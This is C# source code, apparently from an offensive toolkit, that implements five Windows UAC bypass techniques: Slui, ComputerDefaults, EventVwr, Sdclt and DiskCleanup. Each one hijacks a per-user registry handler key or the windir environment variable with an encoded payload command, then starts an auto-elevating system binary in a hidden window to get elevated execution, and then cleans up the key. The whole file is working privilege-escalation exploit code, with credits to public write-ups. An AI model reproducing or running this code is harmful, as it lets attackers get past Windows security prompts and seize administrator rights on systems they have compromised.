public Slui(byte[] encodedCommand)
{
//Credit: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
//Check if UAC is set to 'Always Notify'
AlwaysNotify alwaysnotify = new AlwaysNotify();
//Convert encoded command to a string
string command = Encoding.UTF8.GetString(encodedCommand);
//Set the registry key for eventvwr
RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true);
newkey.CreateSubKey(@"exefile\Shell\Open\command");
RegistryKey sluikey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\exefile\Shell\Open\command", true);
sluikey.SetValue("", @command);
sluikey.Close();
//start fodhelper
Process p = new Process();
p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
p.StartInfo.FileName = "C:\\windows\\system32\\slui.exe";
p.StartInfo.Verb = "runas";
p.Start();
//sleep 10 seconds to let the payload execute
Thread.Sleep(10000);
//Unset the registry
newkey.DeleteSubKeyTree("exefile");
return;
}
public ComputerDefaults(byte[] encodedCommand)
{
//Credit: https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1
//Check if UAC is set to 'Always Notify'
AlwaysNotify alwaysnotify = new AlwaysNotify();
//Convert encoded command to a string
string command = Encoding.UTF8.GetString(encodedCommand);
//Set the registry key for fodhelper
RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true);
newkey.CreateSubKey(@"ms-settings\Shell\Open\command");
RegistryKey fod = Registry.CurrentUser.OpenSubKey(@"Software\Classes\ms-settings\Shell\Open\command", true);
fod.SetValue("DelegateExecute", "");
fod.SetValue("", @command);
fod.Close();
//start fodhelper
Process p = new Process();
p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
p.StartInfo.FileName = "C:\\windows\\system32\\ComputerDefaults.exe";
p.Start();
//sleep 10 seconds to let the payload execute
Thread.Sleep(10000);
//Unset the registry
newkey.DeleteSubKeyTree("ms-settings");
return;
}
public EventVwr(byte[] encodedCommand)
{
//Credit: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
//Check if UAC is set to 'Always Notify'
AlwaysNotify alwaysnotify = new AlwaysNotify();
//Convert encoded command to a string
string command = Encoding.UTF8.GetString(encodedCommand);
//Set the registry key for eventvwr
RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true);
newkey.CreateSubKey(@"mscfile\Shell\Open\command");
RegistryKey vwr = Registry.CurrentUser.OpenSubKey(@"Software\Classes\mscfile\Shell\Open\command", true);
vwr.SetValue("", @command);
vwr.Close();
//start fodhelper
Process p = new Process();
p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
p.StartInfo.FileName = "C:\\windows\\system32\\eventvwr.exe";
p.Start();
//sleep 10 seconds to let the payload execute
Thread.Sleep(10000);
//Unset the registry
newkey.DeleteSubKeyTree("mscfile");
return;
}
public Sdclt(byte[] encodedCommand)
{
// Credit: http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass
//Check if UAC is set to 'Always Notify'
AlwaysNotify alwaysnotify = new AlwaysNotify();
//This only appears to work on Windows 10. Check the version of the OS
RegistryKey osversion = Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows NT\CurrentVersion\");
string windowsVersion = osversion.GetValue("ProductName").ToString();
osversion.Close();
if (!windowsVersion.Contains("Windows 10"))
{
System.Console.WriteLine("System is not Windows 10. This attack will fail. Exiting...");
System.Environment.Exit(1);
}
//Convert encoded command to a string
string command = Encoding.UTF8.GetString(encodedCommand);
//Set the registry key
RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true);
newkey.CreateSubKey(@"Folder\shell\open\command");
RegistryKey sdclt = Registry.CurrentUser.OpenSubKey(@"Software\Classes\Folder\shell\open\command", true);
sdclt.SetValue("", @command);
sdclt.SetValue("DelegateExecute", "");
sdclt.Close();
//start process
Process p = new Process();
p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
p.StartInfo.FileName = "C:\\windows\\system32\\sdclt.exe";
p.Start();
//sleep 10 seconds to let the payload execute
Thread.Sleep(10000);
//Unset the registry
newkey.DeleteSubKeyTree("Folder");
return;
}
public DiskCleanup(byte[] encodedCommand)
{
//Credit: https://github.com/gushmazuko/WinBypass/blob/master/DiskCleanupBypass_direct.ps1
//Check if UAC is set to 'Always Notify'
AlwaysNotify alwaysnotify = new AlwaysNotify();
//Convert encoded command to a string
string command = Encoding.UTF8.GetString(encodedCommand);
//Check that the command ends in "&& REM"
if (!command.Contains("REM"))
{
Console.WriteLine("Command must end in REM. Exiting...");
System.Environment.Exit(1);
}
//Set the registry key for eventvwr
RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Environment", true);
newkey.SetValue("windir", @command);
//start fodhelper
Process p = new Process();
p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
p.StartInfo.FileName = "C:\\windows\\system32\\schtasks.exe";
p.StartInfo.Arguments = "/Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I";
p.Start();
//sleep 10 seconds to let the payload execute
Thread.Sleep(10000);
//Unset the registry
newkey.DeleteValue("windir");
return;
}